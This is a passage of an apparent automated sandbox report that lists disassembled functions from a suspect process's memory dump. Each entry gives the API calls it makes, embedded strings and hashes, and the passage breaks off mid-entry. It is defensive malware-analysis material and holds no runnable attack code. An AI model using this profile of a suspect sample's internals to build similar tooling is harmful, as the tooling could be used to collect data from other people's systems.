                  • String ID:
                  • API String ID: 552707033-0
                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                  Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                  • memcpy.MSVCRT ref: 0040C11B
                  • strchr.MSVCRT ref: 0040C140
                  • strchr.MSVCRT ref: 0040C151
                  • _strlwr.MSVCRT ref: 0040C15F
                  • memset.MSVCRT ref: 0040C17A
                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                  • String ID: 4$h
                  • API String ID: 4066021378-1856150674
                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                  Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf
                  • String ID: %%0.%df
                  • API String ID: 3473751417-763548558
                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                  Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                  Download Yara Rule
                  APIs
                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                  • KillTimer.USER32(?,00000041), ref: 004060D7
                  • KillTimer.USER32(?,00000041), ref: 004060E8
                  • GetTickCount.KERNEL32 ref: 0040610B
                  • GetParent.USER32(?), ref: 00406136
                  • SendMessageW.USER32(00000000), ref: 0040613D
                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                  • String ID: A
                  • API String ID: 2892645895-3554254475
                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                  Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                  • GetDesktopWindow.USER32 ref: 0040D9FD
                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                  • memset.MSVCRT ref: 0040DA23
                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                  • String ID: caption
                  • API String ID: 973020956-4135340389
                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                  Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf$wcscpy
                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                  • API String ID: 1283228442-2366825230
                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                  Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  • wcschr.MSVCRT ref: 00413972
                  • wcscpy.MSVCRT ref: 00413982
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                  • wcscpy.MSVCRT ref: 004139D1
                  • wcscat.MSVCRT ref: 004139DC
                  • memset.MSVCRT ref: 004139B8
                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                  • memset.MSVCRT ref: 00413A00
                  • memcpy.MSVCRT ref: 00413A1B
                  • wcscat.MSVCRT ref: 00413A27
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                  • String ID: \systemroot
                  • API String ID: 4173585201-1821301763
                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                  Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy
                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                  • API String ID: 1284135714-318151290
                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                  Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                  • String ID: 0$6
                  • API String ID: 4066108131-3849865405
                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                  Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004082EF
                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                  • memset.MSVCRT ref: 00408362
                  • memset.MSVCRT ref: 00408377
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharMultiWide
                  • String ID:
                  • API String ID: 290601579-0
                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                  Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memchrmemset
                  • String ID: PD$PD
                  • API String ID: 1581201632-2312785699
                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                  Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                  • GetDC.USER32(00000000), ref: 00409F6E
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                  • GetParent.USER32(?), ref: 00409FA5
                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                  • String ID:
                  • API String ID: 2163313125-0
                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                  Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$wcslen
                  • String ID:
                  • API String ID: 239872665-3916222277
                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                  Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$_snwprintfmemset
                  • String ID: %s (%s)$YV@
                  • API String ID: 3979103747-598926743
                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                  Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                  • wcslen.MSVCRT ref: 0040A6B1
                  • wcscpy.MSVCRT ref: 0040A6C1
                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                  • wcscpy.MSVCRT ref: 0040A6DB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                  • String ID: Unknown Error$netmsg.dll
                  • API String ID: 2767993716-572158859
                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                  Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  • wcscpy.MSVCRT ref: 0040DAFB
                  • wcscpy.MSVCRT ref: 0040DB0B
                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfilewcscpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 3176057301-2039793938
                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                  Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • database is already attached, xrefs: 0042F721
                  • out of memory, xrefs: 0042F865
                  • too many attached databases - max %d, xrefs: 0042F64D
                  • database %s is already in use, xrefs: 0042F6C5
                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                  • unable to open database: %s, xrefs: 0042F84E
                  • cannot ATTACH database within transaction, xrefs: 0042F663
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                  • API String ID: 1297977491-2001300268
                  • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                  • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                  Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                  • memcpy.MSVCRT ref: 0040EB80
                  • memcpy.MSVCRT ref: 0040EB94
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                  • String ID: ($d
                  • API String ID: 1140211610-1915259565
                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                  Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                  Download Yara Rule
                  APIs
                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                  • Sleep.KERNEL32(00000001), ref: 004178E9
                  • GetLastError.KERNEL32 ref: 004178FB
                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ErrorLastLockSleepUnlock
                  • String ID:
                  • API String ID: 3015003838-0
                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                  Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00407E44
                  • memset.MSVCRT ref: 00407E5B
                  • _mbscpy.MSVCRT ref: 00407E7E
                  • _mbscpy.MSVCRT ref: 00407ED7
                  • _mbscpy.MSVCRT ref: 00407EEE
                  • _mbscpy.MSVCRT ref: 00407F01
                  • wcscpy.MSVCRT ref: 00407F10
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                  • String ID:
                  • API String ID: 59245283-0
                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                  Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                  • GetLastError.KERNEL32 ref: 0041855C
                  • Sleep.KERNEL32(00000064), ref: 00418571
                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                  • GetLastError.KERNEL32 ref: 0041858E
                  • Sleep.KERNEL32(00000064), ref: 004185A3
                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                  • String ID:
                  • API String ID: 3467550082-0
                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                  Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
